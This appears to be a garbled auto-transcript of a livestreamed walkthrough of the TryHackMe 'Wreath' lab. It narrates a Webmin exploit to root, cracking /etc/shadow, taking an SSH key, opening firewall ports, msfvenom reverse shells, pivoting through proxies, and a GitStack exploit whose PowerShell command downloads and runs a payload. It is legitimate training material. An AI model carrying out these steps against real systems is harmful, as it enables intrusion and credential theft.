Let's go ahead and get into Wreath. Alright, and we will try to get into this guy and we'll see what happens, I guess. So this is one from a holo stream to a Wreath stream. Now we do have file open. We do have Wreath on here. We already have done some stuff with it, but it's most likely been reset, so looks like we're starting over with that, huh? So let's go ahead and let's start up with Wreath. Mmap. I don't even know what. What are we in Mmap being? 10.273.200. Tappy tack, boom boom, 10.200.73.200. Just want to try that. So we got 480, 22, and 443 open. Okay. Let me go ahead and sudo nano etsy host. I don't know if I even have. Okay, it is correct. 10.273.200. All right. So if you were to go, you're in the wrong directory. What do you mean? For what? Oh, you're saying this over here? Yeah, I am. Thank you. Thank you very much. Alright, 80, 22, 443 so far. Let's go ahead and we'll actually run that one more time just to make sure that there's not more to it. But we did see that it was Thomas Wreath. If you were to go to that IP address like right there, it would come back as Thomas Wreath. Just so you know, and it'll just say that you can't log in as that or whatever. So we do get this Thomas Wreath like right here, right? Let's go ahead and do a Go Buster on him. Do a dirtac U. It's not going to be a PHP. We'll use big.text, and this is going to be for, I believe it's HTTPS actually. It is HTTPS. Thomas Wreath. So that means that we are going to have to, which I forgot how to do. Thomas Wreath.thm, right? .thm, yep. And then let's go ahead and type in Go Buster. And we are going to have to Go Buster dir. Grep for cert. I don't want to have a cert in there, right? Or I want to ignore the cert, right? TAC K. There we go. So we'll do a TAC K. Oh, I guess I already did it once for TAC K. All right. And that's going to make sure because the cert isn't valid, obviously. And if GoBuster sees that's not a valid cert, it stops trying. So immediately stop trying. So we're going to go ahead and run this like real quick. I do believe, because we did this last time, right? And we didn't find a vhost. We didn't really find anything in the directory. But we did find this port 10,000. Once this mmap's done, we'll be able to see that. But we did find a port 10,000 last time we did this. So let's go ahead and go to 10,000 and see what we got. So we get this username and password for Webman. Let's go ahead and do a search exploit for Webman. And we get a lot of different stuff in here, right? A lot of stuff. Be a lot nicer if we knew a, what is it, at least a version or something like that. But it says you must enter a username and password to log in on the server. Thomas.Wreath. We try admin. Don't save. And we see what it says. Appear session login CGI. Okay. But we do get a lot of things. Unauthenticated remote code execution. That would be nice under Metasploit. Let's go ahead and try it. Let's just try one. I don't remember which one we used. So we'll try a couple and then we'll go with the one that I actually did use before. Let's go and try some MSF console real quick. We'll see what we get here. And we do get that webman like right there. I guess I used different exploit. We're going to go ahead and try this guy. So unauthenticated remote code execution. Let's go ahead and search for webman. And we do get quite a few things in here. Show CGI remote code execution. Yeah, sure, why not? Go ahead and use 0. Show options. And if you did notice, I am using Metasploit version 6 finally. Set our host to whatever this guy is up here. 10.273.200. Let's go ahead and run that. We'll see what we get. They said unauthenticated, didn't it? Wants a username and password. That's not going to work for us. Okay, so let's go ahead and try to do I guess a backdoor. That sounds good. So use 5 or use that guy. Show option. That's a run on Perl. Set our L host to ourselves. We'll set SSL to true. Set our R host to not him. Set our auto host to right here. I have to downgrade it to version 5. Still haven't done it. Yeah, so I have one that's running version 5, another one that's running version 6, just in case. And that should be, I think, it. So let's go ahead and run that. See if we get anything. Almost start going a little crazy up here. And there's our port 10,000, like right there. Sending command and command shell session 1 open. Alright, cool. So we got something like right there. ID. And we are root on there. Alright, awesome. Let's go ahead and do a which Python? Which Python 3. And we do have bin Python 3, not user bin, so that's kind of weird. So let's go ahead and cat scripts full shell. And we'll go ahead and grab this, Python 3. And do an lstech LA. ifconfig. Get our bearings here, pwd, where are we? Okay. Let's go ahead and drop that etsy password, or etsy shadow file. Go ahead and drop that. So we do have this Wreath, like right here. We try to crack that guy, like right there, right? Let's go ahead and grab this. We'll go ahead and do a nano shadow.txt. Looks like I already did this once, and I have a root and Wreath. So let's go ahead and do a John shadow.txt word list rocky.txt fork 4. I think I actually tried this before, and I think I had actually used it was going so slow that I had to use are those bcrypt? I don't think those are even bcrypt though, but I had to use a hashcat for it. So if I look up my notes here, so I did use hashcat for it, I believe. So we get our reverse shell, boom boom, or root, or maybe I just never dropped Wreath, I don't know, but we do get our reverse shell there, right? Awesome, easy day, okay? Let's go ahead and start to get some more of our bearings here. Alright, let's first try to see if we can put them in an interpreter shell. Search for shell 2. Use 0. Show options. Session tech I. Set session to 1. Let's go ahead and run that. And I do remember last time trying to do a whole bunch of stuff, couldn't really get anywhere, and then we looked at some firewall rules and realized, yeah, we everything's blocked except for port 10,000. So, you know, that did cause a little bit of a damper in our parade there, because I was trying to bring it back and get some type of, okay, so we can't find anything there, right? I was trying to bring it back as some type of interpreter shell. But let's go ahead and sessions 1 again. Let's go ahead and do a cd into root. Oh, whatever that is. We got PS1 files in here? What are you? It's been from one of the other. You are a script kitty. Oh my god, I kind of want to cat that one. What is this? LOL. Okay. What is this one like right here? Why is there a PS1 script on here? Set permission for current user? What do we got here? Got some NTLM hash stuff going on here. What is this? What script even is this? Like right here. Wow. What the heck is that? Power Dump by David Kennedy. Okay. Social Engineer Toolkit. Alright. Well, one of the guys used that, obviously. They got mmap on here already. They already have netcat on here. So you may have to load all these onto here. Someone already put socat on here. I'm actually looking for that .sh key, so we can use shuttle with this guy. What the fuck? Cat ID RSA. And let's go ahead and grab this key, like right here. What is going on with this box? Let's go ahead and nano ID RSA. We're going to throw this in there. And now we can most likely do a shuttle. So a shuttle. And we're actually going to be doing that to an RSA key. So this one's going to be a little bit different, doing it to an RSA key here. I think I have it up on how to do it here. Yep, check our root, SSH command, SSH check I, root ID RSA for that network. So we're going to do, so it's going to be tac R root, and so we have root at the IP address, right? Tac SSH command. We're going to throw in this. Is this me or your camera died? Did it die? Oh my god, it's probably going along with holo. Oh no, yeah, that died. Whatever. I think that's a good spot to die though. That looks wonderful. 1 second. Bam. Bam. What about now? Oh, nothing. Bam. Bam. We're going to delete it. We're going to bring it back on. Deactivate. Activate. I wonder if that did anything. Oh yeah. I am back. Whoa. Look at all those dance moves. Alright. Yeah, it's probably part of that. It was probably with that whole network. Alright, so we do that SSH tac I root IDRSA. I didn't actually call it that. I just called it IDRSA, so we'll go ahead and get rid of that. Okay. For 10.273.0 network, right? Permission denied, failed to establish SSH session 2. Really? Okay. Can we do sudo? Does it have to be like that? I feel like it doesn't. Yes. You want to know why? Probably because I haven't logged in as root yet with the IDRSA key. So let's go ahead and try doing SSH tac I IDRSA for root at that IP address. That knows that a lot of times Shuttle doesn't like to work unless you log in with that. Oh, you know what else? Maybe I should change mode to 600 for IDRSA, huh? Since it's an IDRSA key. Should probably change mode to 600. Okay, still couldn't do it. Let's see here. Permission denied. Why is permission denied? Did someone actually like change out the fucking key? I feel like someone just changed out the key. Whoops, no, don't abort that session. Okay. Okay. We're still getting that permission denied, public key, whatever, blah, blah. Let's go ahead and see what that is. Permission denied, public key, blah, blah, blah. Okay, let's go ahead and see what that means. That's in Japanese. How to fix SSH, how to? That's a great question. Alright, permission denied, yeah. Enable password authentication. Change file system permissions. Permit root login. Public key authentication, yes. You have to like do all this inside that thing. I didn't even do it with tac I. Ah, yes, yes, just like that, I see. Why is everything showing up in Japanese nowadays? Okay, that was super helpful. Anyone here read Japanese? Jesus. Let me go ahead and count my root IDRSA and see if that's the same thing. So we got B3BLB. B3BLB. Okay, yeah, same thing. It's not the same thing. It's not the same key. I want to try something real quick. I want to see if maybe someone changed the key like a damn idiot. I mean, that's not going to work, is it? Okay, so someone changed the key like an idiot, so let's go ahead and throw this key back in there, since obviously someone's an asshole. There. Cox. That's how you do it, like right there. Alright, so now we are shuttled into it, right? Let's go ahead and actually background that. So we'll do a tac D and background it, right? Now we should also be able to actually SSH that guy root into there. So we had that from a different stream. If we can actually log in with root, we can, okay. Cool. So we're in this guy pretty good. Let's go into MSF console, tac Q. Let's go ahead and bring a bash script back probably. We can do a witch bash. And so then we can have a proxy change also running. Now like I said, this guy right here does have a firewall up. We found that out last time when nothing was coming back to us. And we did a firewall command list all. So that's a firewall tac command tac list all. And we can see that ports 10,000, 8,002. So other people have been out of this box, obviously. We're going to pick a real port. Maybe it was a newbie's mistake. Nope, he's a douche. Newbie would have deleted IDRSA. What happened here? Okay, there we go. So let's go ahead and we will, so we got that witch bash, right? So we want to actually add in another port here, right? So we got to do firewall command. Alright, tac zone equals public, and then add a port. So we do firewall command zone equals public port. Is it tac port or is it just port? Add port. Add port equals, we'll do 53. Bad port, most likely missing protocol. Oh, up /TCP. There you go. Alright, just in case you guys actually couldn't see that, go ahead and you see the IDRSA key. There we go. Firewall command zone public add port 53 TCP. Alright. And then we can maybe make a little bash script here or something like that. And we can send that back to him. So let's go ahead and do an MSF Venom tac P. Yeah, Linux. Yeah, looks good to me. Let's go ahead and see what my IP address is. 1050.66.5, so mine's going to be a little bit different. We're going to do 1050.66.5. And shell reverse TCP, we got our L host and L port at 3333, but we actually want to do L port 53. We're going to make that an L file, and it's going to be shell.elf. We might have just been able to, actually, let's just try to run a bash script, huh? Let's do we have which NC on here? No NC, and boom. User bin which, okay. Locate NC. Okay, which bash. We just make a bash reverse shell. So let's go ahead and cat scripts bash reverse shell. Let me grab that guy right here. My P address again was 1050.66.5 for this one. Let's go ahead and throw that in there. So this is going to be for 53. Okay, let's go ahead and do a use exploit multi-handler. Set payload. Yeah, generic shell reverse TCP is fine. Set L host to myself. Set L ports 53. Let's go ahead and copy this. Let's go ahead and run that. And let's try to send this back to it. See if we get anything. And we do, we get command shell session 1 open, and we are root on that. Go ahead and do a search for shell 2. Use 0, show options. Set session to, I guess, 1. That's the only one that we have. We'll go ahead and we'll run that. I feel like session 1 is not the only one that we have, though. I feel like we have more than just one session, don't we? Maybe not. Okay. He's doing something. He's trying. Emotional damage. Alright, shell banner. What is this over here anyways? Yeah, we have more than one session in here. Let's try doing an elf file. I don't know why the hell I even have this guy open up here. Let's go and exit. Attack Y out of there. Exit out of here. And let's go ahead and just do an elf file. On port 53. We'll run this guy right here. Port 53. Enter. And yeah, we'll use exploit multi-handler. We'll set our payload to Linux x86 shell reverse TCP, right? Set our L host to myself. Set our L port to 53, and we'll go ahead and run that. Then over here, we'll go ahead and which wget? Do we have wget on here? No wget. Did someone already upload onto it? Because that'd be sweet. CD into root. Not looking like anyone uploaded it yet. So let's go ahead and upload wget onto here, because I want to try something real quick. So we can do a wget binary. GitHub. One of those binaries. I don't know if there's a wget binary on GitHub. Where is it? Static binaries, wget. There we go. I don't know why it's like right there. Let's go ahead and I don't think we can download it. We can download it, but how like we gotta put it on the file system after that? You answer that one, huh? Guess we can always try to SCP it over. I can always try to SCP this too, huh? I've not SCP'd something in a long time though. I don't remember how to do it. No, let's see how to SCP something. I use SCP command to securely transfer files. Yes, please. Okay. So SCP, whatever file it is, boom, then the remote directory. Okay, let's go ahead and try that like right there. So we'll kind of minimize this guy down like a little bit. So we're going to do an SCP, our file, which is going to be shell.elf, shell.elf, right? Remote username, which could be root at IP address, right? ISFig 10.273.200. Okay, root at him. All right. Slash our that like little guy slash we'll say root. Enter. Can I do that? Permission denied. Public key, blah blah, connection closed. Oh, I actually throw the key in there, huh? This is no, I guess attack I. Root ID RSA, can I do that? Did that just work? Shell.elf. Cool. Okay, so we sent it over to the SCP. Yeah, I always forget the SCP syntax. If you don't know what SCP is, it's a way to send files over SSH. That's all SCP is. So that's all we did. We have an SSH connection open, right? And we were able to send that file over. Let's go ahead and shell.elf. Now it is running on port 53 for shell.elf. So, and we did open up that port, so we should get a callback over here. Should. Alright, cool. We do get command shell session 2 opened. If I do an ID, we are root. Don't know what all the rest of that crap means, but we are root, okay? Let's go ahead and try to get that session attack I. So now we have this shell like right here. Let's go ahead and try to do a search for shell 2. Use 0 show options, set session to 2. We'll run that. Actually, wonder if we actually have problems with this guy. And okay, post module execution completed. So didn't really like that very much. I don't know, did it? Okay, let's search for auto route. Use 0. Show options. I don't know what the hell my subnet even is. Sessions 2. I have config. I have config doesn't work something. Okay, whatever. Sessions 1. I have config. And 10.273.200 with a /24. So let's go ahead and do an ARP request. See if we get anything on here. So we do know that a 100 and a 150 exists. So let's go ahead and actually put that into here. I don't think I have that in this guy right here. Finding other devices. Okay, I just scanned the network. We also did an ARP request. We'll also show that we did an ARP request, just so it's not just like I just scanned the whole network. You know, I am a networker. Hey, Werewolf, how you doing? Networking is my job, so I mean I should show somewhat that I'm trying to do networking, you know. So we'll just go ahead and we'll say ARP, boom, boom. So we do have that. And we have 100 and 150, and I believe this guy only has 2 machines. If I go back over here, we got that him, and him. So that might be it. 100 and 250. That might actually be it, like right there. Okay, weird. So whenever I scan that network, we have 150 and 200, and 250 actually with just port 22. It looks like though. We do have 150. I don't know what that 250 is for. That might be for something totally different. But we did do that ARP-A. We have 100, 150. So let's go ahead and control Z out of here. Route. Do we have any routes anywhere? Okay, just that guy. And everything else is going out of quad zeros. Alright. So wildcard 10.273.0 to quad zero. So anything that is now within that network that doesn't know about, send out of quad zeros, which is Ethernet 0. Okay. Cool. So let's go ahead and background him. And we'll go ahead and do a show options, set session to, I guess 1, since that seems to be working like a little bit better. Set subnet to 10.200.73.0/24. We'll go ahead and we'll run that. Oh, session may not be compatible. Okay, let's try session 2 then, I guess. Okay, maybe this thing just hates me. Incompatible session platform Linux. Okay, so I guess we already have that shuttle running, right? So I guess at least we have that shuttle running, so we can work off of that now. But we're not really going to do an map scan with shuttle, so let's go ahead and search for port scan. That's probably why he actually put netcat over here. He probably did like a netcat. So if we do a sessions 1, and we do a stack LA, CD back, I guess. You do a netcat tac ZV. Alright, the Z is for port searching for the network of 10.200.73.0/24, and we're going to look for 1 through 65,535, right? And that's going to go out. Oh, okay. Oh, you know why? I have to do a period / netcat because it's running as a binary, huh? Forward host looked up failed, unknown host. Really? You should be able to look up an entire network. But I guess we could just look up, since we do know some IP addresses, we could always say like 100. 1 through 65535. Oh my god. I'm going to copy that again. Damn binaries. And he's going to start doing that. Now, another way to be able to do this is to use port scan. So we can background this, search for port scan, show offset or use 5. Why use a TCP? Show options, set our R host to 10.200.73.0/24. Set our threads to 20. Set our ports. Now we actually want to pick ports because we're using port threads. It's going to take a minute. 22, 21, 23, 139, 445, 3389, 88 because there is a domain controller. 443, 8080, 8888, and 80. And I mean, that should be about it. I got a lot in there. If I do show options, we can see that I have 80, 80, 80. I actually have 80 twice, whatever. 22, 21, 23, 139, 445, 3389, 88, 443. We can also do something like, was it 8443? Alright, something like that. Let's go ahead and run that. So, since the only thing we have up is shuttle, he's going to come back with everything as working. So we really need to get some type of interpreter shell working over here. So let's go ahead and use exploit multi-handler, and we need to set payload to Linux. I'm going to tab twice and see what type of payloads we can use for Linux, because we really need to get a interpreter session up and running. x64, it's probably going to be x64, so we can do an interpreter. We can actually do a reverse TCP like right there, right? So do Linux x64 interpreter reverse TCP. Let's try something like that. Let's go ahead and do a Control C over here, I guess. Rename TAC A. See the 64 in there. It's good enough for me. Alright. From here, let's go ahead and try to do a. So we have that guy right. Let's go ahead and show options. Set port 53 should still be okay. Let's go ahead and go to sessions 2, I believe it was. We're gonna, yep, okay, good. That's exactly what I wanted to happen because he was on port 53. So our L host is going to be 1050.66.5, that's correct. With a payload, Linux x64, that's correct. So let's go ahead and do an MSF Venom file now, right? Venom tag P, Linux x64, interpreter, reverse TCP, that's correct. L host is not correct, okay? 1050.66.5. L port's going to be 53. Let's go ahead and remove tag RF shell.elf. And we'll just call it shell.elf because then I can just go ahead and do that SCP right over again and send them over like that. And then go ahead and run that and run it over here, right? So let's go ahead and run this guy, get this guy up and running. He shouldn't take too long to make. There we go. Not a very big file. That's what I like about the Linux ones. They're usually not that very big. Alright, cool. He's 100% done. There's my shell.elf file again. Change mode 777 for shell.elf. /shell.elf. And hopefully we get an interpreter session back. Since the firewall is up, but I don't think interpreter session is really going to bother that with Linux. Alright, cool. We get an interpreter session. Get UID. Does it work? It does. Cool. Run auto route. TAC S for the 10.200.73.0/24 network. Alright, cool. Control Z, yes. Let's go ahead and search for socks. Now, the reason we're going to use a proxy, it doesn't do like socks 5 anymore. I'm used to MSF5 U0. Okay, so we just changed the version here. Okay. Oof. Oof. Okay, let's go ahead and run that. Alright, so the reason I'm doing a proxy is because with shuttle, if you do an mmap, anything like that, everything will come back as being up and running. If you have a proxy, and now if I do proxy change, you saw how much stuff was up and running. It said that everything was pretty much up and running, right? Remember I came up here and did it? Look at it. I promise you 124 doesn't have port 88 up along with 134. Not all these people are running Kerberos. Okay. Along with 123. These guys don't even exist. But it's saying that they're up and they have all this stuff. No, they don't. Alright. But if we do a proxy change that map, right? And we do it for, let's say, what is it? 10.200.73. Yeah, .150. Sure, why not? .150. We don't ping it, okay? Because we saw 150 was alive with that ARP request, right? Now you can see that, hey, yeah, stuff is closed down. Get that drink. Oh, crap. Hydrate? Oh my god, 123, what's 123? NTP? You down with OPP? Yeah, you know me. Yeah, no, I am talking a lot, huh? Talking 1,000 miles per hour too. Alright, there you go. I actually grabbed water too, so. Alright, so we have on port 150, we have 80 and 3389. I forgot who the other person was, so let's go ahead and go into sessions 3. ARP request again. And we also have 100. So let's go ahead and do a proxy change for 100. Now also, just so you guys see, if I Control Z this, yes, search for port scan. And I use TCP one again, right? So we'll use 5 again. Now if I run that again, if I show options, okay, it should all be the same stuff, right? Boom, boom. If I run this again, it's not going to tell me that everybody's there. Alright, so that's nice too. This guy I don't think actually exists. Whoever they said existed, 100, he may not actually exist. He may exist in the ARP scan. He may exist there. He may exist whenever they're building a machine or something like that. That could have been real because it just made the ARP table may not have been updated. You know, once you see a host, it usually stays in there, and especially with a VM, it doesn't really go away. So that's 100% realistic that there is a host in an ARP scan that actually does not exist, or they unplug their computer. In real life, you know, the computer can be turned off, things like that, but they're still in that ARP scan because their ARP table kept it to be able to utilize their MAC address, their IP address, right? If you guys don't understand what I'm talking about, like right there, let me know in the chat, and I will start doing more networking videos. I'll start throwing some networking videos in the mix with hacking videos. That is my actual job. Alright, so 10.273, 150 has 3389 open, and also port 80. Now, since port 80 is open, and we're going through proxies and everything, we are going to most likely have to deal with proxy, right? Let's go ahead and see how I did over here. So, we made a little proxy for SOCKS 5. Okay? Well, then Wreath, and then we go into them, right? Let's go ahead and try that. We still never got that webmin. Guess we just didn't need to. Alright, let's go ahead and go into a Wreath one that I built, and we'll show you what it says in there. Okay? Wreath. It's just a SOCKS 5, 127.0.0.1 on port 1080. Now, one thing, if this is your very first time doing proxies, you do have to do sudo nano /etc proxy change 4.conf, even if you're using 5. What is TCP IP? 1000 page book explains it. What? Are you serious? Why is it 1000 page book? Why does it take 1000 pages to explain what TCP IP is? TCP is really just transmission control protocol. That's all it really is. TCP is really just it ensures that the traffic is going across and that you receive the traffic. That's all TCP is. UDP sends and forgets. All right. According to Cisco and Net Plus, Sec Plus, TCP is reliable. UDP is not reliable or unreliable. UDP is for videos, for frickin' Facebook Messenger, for video games, things like that, right? That's UDP. Okay. It's for Netflix. Now, if you're smart, you're going to say, well, Ryan, you're a damn liar. Netflix buffers. So it's making sure that it's actually getting across. That's a software within Netflix. Alright. That's what that is. That's software within Netflix. But TCP is what you use on the internet. Sends out like, hey, I sent this much information. Did you get that much information? It marks it with numbers. It's like, hey, I sent number this to this. He's like, yep, I got that. Here you go. This is the last number I got. The guy says, yep, that's correct. Here's the next part of it. That's what TCP does. UDP sends and forgets, doesn't care because it's all about speed. So we go into proxy change, right? A little side quest there. And we put in SOCKS 5, and then we just put in 127.0.0.1, 1080. This 950 one like right here, that's for Tor. Okay, just so you know. Alright. So if you're not using Tor, you can just go ahead and ampersand or pound sign that out. Alright, so we got the SOCKS 5 right, port 1080, because that's what I put in there. If I also go into search for SOCKS, and I use 0 now, show options, you can see that this is also running on 1080. When I run that, it runs in the background, right? If I already kill it, I can say kill 2, okay? Run, and it's going to run in the background. Job 3, Start a Snox 5 proxy server on version 5. Server port 1080, which I'm also running 1080. Yes, UDP is a Firehose, which I'm also running 1080 over here, which is also going to be on my web server. Alright, to be able to get in this guy. So we'll go ahead and we will now, hopefully, try to get into, what IP address am I trying to go to? 10.273.150. There you go. There's your 1,000-page book about TCP in about a minute. Okay, so we get this like cool little thing. Page not found 404. Let's go ahead and go into registration login. This says I can go there. It also says I can go to Git Stack. If I actually did it correctly, I could probably go there. And I don't think it's HTTPS. Most likely HTTP, internal web server. Register. If I can actually spell and go into it, then I might actually be able to get into it. Alright, default username is admin-admin. You can try that. Admin-admin. Alright, well, good job. They did change the default username and password. I did actually, during a field op, not too long ago, they wanted us to set up some Wi-Fi pucks. And that was like the fourth frickin' comm asset. You know, we had coax cable, we had a couple satellites, things like that. That was like the fourth asset. And I was like, here you go, here's your Wi-Fi pucks, right? Well, the Wi-Fi pucks, you obviously buy them, and they all have different names, different passwords and everything. So I hooked up to it with Kali, did a quick go buster on there, found admin login _login or something like that. It was something weird. .html, we hopped into there and figured out that the username and password was admin-admin, and then was able to change all the Wi-Fi pucks to be the same name, same password, stuck them up all around the building, stuff like that. The only thing that sucked at the end of the op, I didn't do it, one of my Marines did it. I didn't do it, but they had to go back through and turn on each one by one, like individually. There's only like 20 of them. They turn on it individually, connect to it, rechange the name back to what it's supposed to be with the proper password. So when we hand them back in, you know, you have a whole bunch of hacked Wi-Fi pucks. But let's go ahead and search exploit. I don't know why that just came up, but oh, because of admin-admin. There we go. Let's go ahead and search exploit git stack. So we do have a remote code execution here. Alright, and we also have an unsanitized argument remote code execution. Let's go ahead and actually let's try that Metasploit one. That's a Ruby. .rb, so we know it's Metasploit. Let's go ahead and search for git stack. I don't like to reinvent the wheel ever. So if I can do it real quick, let's do it. If I can't, or if it doesn't work, whatever. But at least we tried. A Windows interpreter reverse TCP is definitely not going to work. But we might be able to get something back to maybe this guy right here, right? So can we stop that shell.elf? Or we get close out? Oh man, that sucks. Okay. Use exploit multi-handler. Run. That sucks, huh? Okay. There we go. Let's do that and pretend like he doesn't exist, right? Alright. And let's go ahead and search for git stack again. We'll log back into that guy. So we're doing SSH tech I. Root ID RSA to root at that IP address, right? 10.273.200. And let's go ahead and use one. What? Use one. Let's go ahead and set the payload to Windows. I wonder if it has to be a reverse TCP. Let's double click. Yes. Looks like we get some bind on here. Might be able to do a bind TCP. We try an interpreter bind TCP. I would much rather just try at first a regular shell bind TCP. So we'll try something like that. Windows shell bind TCP. Just in case it has, I mean, it's not going to bind anyways, but just in case. And we'll try it all at once too. We'll fire it off at it, something like that. Show options. Set our host to 10.200. What was it? 150? 73.150, I believe. And let's go ahead and run it. Payload exceeds space and execute call. Okay, so maybe we are going to have to run it with shell. We run it like that. Okay, so it's obviously we need to only put so much space in there, huh? Set payload to Windows. Can we do like a generic? generic shell reverse TCP. We run that. Okay, that's still, try one more time. Okay, so I know that I'm not even on the right IP address. I know that. I'm just seeing if anything fits or what would fit. It said interpreter at first, didn't it? Or if we just add a user. Let's try that. Let's try Windows add user. That'd be pretty funny, wouldn't it? Let's freaking try it. Damn, they used the space. That would have been hilarious. It's like, let's go. Let's try to get the password smaller. Set user to Ryan. Set password. Set pass to pass. Oh, okay. You don't know if it meets it or not. Set force. No, I want to force exploit to true. Thread. Set password to. Let's go ahead and run that. Okay. So let's go ahead and try some local execution up here. And search exploit. attack-ng. Now, if you were watching the stream before, you know that I might be overwriting this, yes. Then you would know that it was this one that we got to work up here. We did get this somehow to connect, but it was this one up here that we were working with, and it didn't seem to work very well. But then that was because the stream, the box broke, much like Holo likes to break. So let's go ahead and do a cat 43777.py. Alright, I believe I do have to actually change something in here. PowerShell command, what command you want to execute? Oh damn. What do I do to that thing? There's the webman exploit right there. That also works. So I obviously already messed with this guy once before. 10273.150. What command you want to execute? We actually executed PowerShell EP bypass wget 10273.200.888 shell.exe. So since I can't talk to myself, I most likely put 888 something with 888 onto here. So I most likely did some type of MSF Venom payload, right? Windows. I guess x64, yeah, set the rhost equals to, I don't know why it's a dash. We go set the rhost equals 10273.150. File type's going to be executable shell.exe, alright? Like I said, we already did this all a couple streams ago, that's why I'm kind of just moving through it a little bit quicker. I don't think I recorded it though. I'll stay hydrated, right? Alright, so let's go ahead and get that guy onto here. Let's go ahead and do a session attack I. We do have that interpreter session up and running, so let's do a session 4 because we don't have wget over here, right? Which wget? Yep, wget doesn't exist. So we are just going to have to upload it. So let's see where we're at. We're in /root. That's okay. We'll go ahead and upload it. Upload shell.exe. Alright. From here, what we're going to do is we're going to cd into root. Attack LA. We're just going to do a Python. Which Python is it again? Which Python 3 maybe? Okay, yep, it is Python 3. So we're just going to do a quick Python 3 attack-ng hp.server on port 8888. Alright, so what this is going to do is it's going to open up PowerShell and it's going to do an EP bypass, but you really didn't have to do that. TCP IP guide hardcovers. Why? For what? Like you have your 7 layers. People do not teach stupid people acronyms. You got your physical, right? People, right? Your data link layer, do. Your network layer, not. Your transport layer, teach. Session layer, stupid. Presentation layer, people. Application layer, acronyms. Data link layer, in some books gets busted out into two different things. So, I don't understand why. But we're going to do a PowerShell if you bypass. We really don't even need to do that, but that's okay. We're going to do a wget. I should probably do a use basic parsing here, huh? Just in case. So we're going to wget, so we're going to try to download from this guy down here. Okay? That .200 address, which is, if you don't remember, this machine like right here. This is because, please do not throw away sausage. Yep. Please do not throw away sausage. Please do not throw sausage pieces away. And there's also another one, something about porn stars, but I don't remember it. It goes the other way. It's like double penetration at the end, but I don't remember what the hell that one is. I remember the 26 pair color code though that I learned in the Marine Corps, which is really bad. That acronym is bad. But every time I say it, everyone does a little, but nobody ever forgets it, and everyone remembers what it actually is. So, all right, PowerShell. So it's gonna do that. We're gonna do a wget. I'm gonna use basic parsing. I don't think I had to, but just in case, I'm gonna do that. And what that's gonna do is if Internet Explorer has never been open before, that you didn't run your initial thing on Internet Explorer, then this will bypass that. Just use basic parsing. All right, and then we're going to download from this guy over here, right? The server, the web server that they have up and running on the internal network that could talk to the internal network. Excuse me. It's going to download from him because this guy cannot talk back to me. This 10.273.150, it cannot talk back to me, right? I'm pretty sure it's Windows because we have port 3389 open. So that's good. You know, tells me that's Windows, right? So let's go ahead, and also when we did this the first time, we started doing like dir. We did an ls first, then we did like an id, we did a dir. We saw that we were in a C drive somewhere. So from there, I'm doing this guy. I did on port 888. I made a Python server on the web server for port 888, which will also tell me, did he actually get him, right? Did this actually work? So let's go ahead and save that, and we're going to do a Python 3 43777.py. Okay, maybe it's Python. Python 43777.py. Now he's going to try to execute the command. We're going to see if the command comes over here. If it does, then we're going to try to run that command. Now last stream, this part took a while for it to execute the command and come back over to here and everything. That took a minute to do. And by took a minute, I mean like we actually had problems with it. Let me make sure that that IP address, I guess, is correct. I have config 10.200.73.200. I'm also wondering if he has a Oh. 10.200.73.150. That's the IP address that we're attacking. 10.200.73.200. That's correct. Okay. And we can start that Python server again. Let's also make sure that this file even exists in here. And we do have our shell.exe. So cool. Let's go ahead and do that again. And we'll just try to run that guy a couple times. I'm going to get rid of that use basic parsing because last time we did not use it. That might be making it too long. I don't know. Okay. But it's also going to try to make a repository. It's also going to try to make a username and password with a token and all that good stuff, right? And it's going to try to also get a password list. Let's go ahead and try to run this again. We do find a user Wreath. Okay. And if I do a session stack I. Oh, never mind. If I do a cd this home, that file might be too big. We do have a Wreath in here also. So this file may be too big. Now I'm wondering maybe we can just do a PowerShell reverse TCP if I upload that. Yeah, that guy right there. Bullshit, he exists somewhere. See in a holo. He 100% exists somewhere. Invoke PowerShell TCP. Oh, did I do it all caps last time? Yep, I've done that before. Okay. Alright, so let's go ahead and copy from holo, invoke PowerShell TCP.ps1. It's right here, right? And let's try to write that power. Let's see if we can actually put that PowerShell script up and in there. And we'll upload that guy into the root, remember? CD in a root. Okay. And let's go ahead and upload PowerShell. Oh crap. He's still in Holo's directory. That's good. That's good. We'll go ahead and we'll upload invoke PowerShell because he's still over there. Invoke PowerShell TCP.ps1. There we go. Okay, we'll go ahead and upload that guy, and then we'll try to upload him into here. Now I'm still going to do a wget command because I want to see if he's actually talking back to this guy down here. Not talking to him, is he? I wonder if he can ping down 150. This guy down here can ping 150. I'll do it last time because I did it before. Reverse shell, 2 Metasploit. See, I got freaking evil WinRM last time. See? I'm an idiot. That's my fault. That is 100% my fault. You want to know what I didn't do? Is I didn't open up the port again. Now did I? So I have to go back to firewall command. Firewall command. Tag zone equals public. Port equals port, right? I think I said say that add port. Say that thing last time. Add port equals 8088/TCP. Obviously, you have to have 8088 open for this to actually work, right? You know, we're going to try it with the PowerShell script first. We're going to invoke PowerShell TCP. Okay, so he got him. We have a 200 request down here. You saw how much faster that went up there, right? Awesome. Now what we're going to do is we're going to go hardcore. We're going to use exploit multi-handler. We're going to set the payload to Windows shell reverse TCP. That thing, right? Shell reverse TCP. Set our L host to myself. Set our L port to, we'll say 1111. Why not? And we'll go ahead and we're going to run that. And we're going to do up here is we are going to go back into this guy and we are going to run PowerShell tag EV bypass. Sure, why not? That obviously worked last time. And we are going to run invoke PowerShell TCP.ps1 period / invoke PowerShell TCP.ps1 invoke PowerShell TCP TAC reverse TAC IP is going to be 10.50.66.5, which I'll be surprised if you can actually talk back to him, but we're going to try. TAC port is going to be 111. Let's just try that. That's a way more hardcore way of doing it than what we'd have to ever. We're going to try it. Okay, so he did not get back to him. That's okay. Let's go ahead and actually have him try to talk back to this guy. And then from here, we can try to get information off of him and everything like that. Because we can upload everything to this root, right? So let's go ahead and actually let's have him talk to someone over here. Session tag I, session 4, shell, ID, whatever. Okay, which our cat script full shell. This is way more hardcore than we'd ever have to do, but it's just more fun. It's more fun to do this way, you know. You get more bonus points doing it with PowerShell. You guys said you want more PowerShell, so nano. That's what you guys said on the YouTube freaking thing, that you guys want more PowerShell. Invoke PowerShell TCP TAC IP is going to be 10.200.73.200. That's port 111. So now what that means is that we have to add in that port 111, right? We have to have that in there so that he can NC. Ooh, somebody already did it for me, right? They already put in the binary, right? /NC TAC LVMP 111. Thank you very much, whoever put that in there. Let's see if that works. Damn, nothing. Might be doing too much. I actually have one more idea. We're going to try one more way. And then we'll stop, okay? So let's go ahead and CD back. CD in holo, it's actually in there. Nano, invoke PowerShell, TCP.ps1. We can actually go all the way down the bottom down here. Okay, so we can do an invoke PowerShell, TCP. And then we're going to do TAC reverse, TAC IP. And then we're going to give the 